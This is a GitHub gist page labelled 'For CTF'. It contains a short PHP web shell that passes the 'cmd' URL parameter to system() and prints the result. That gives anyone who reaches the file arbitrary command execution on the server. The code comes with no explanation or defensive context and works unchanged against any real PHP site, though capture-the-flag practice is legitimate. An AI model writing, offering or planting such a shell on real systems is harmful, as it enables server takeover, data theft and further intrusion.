Skip to content

Instantly share code, notes, and snippets.

@sdsdkkk
Last active November 20, 2016 14:47
Show Gist options
  • Save sdsdkkk/cdca256eb5113fecc5f9ab106300edb4 to your computer and use it in GitHub Desktop.
Save sdsdkkk/cdca256eb5113fecc5f9ab106300edb4 to your computer and use it in GitHub Desktop.
For CTF
<?php
echo '<pre>';
echo system($_GET['cmd']);
echo '</pre>';
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment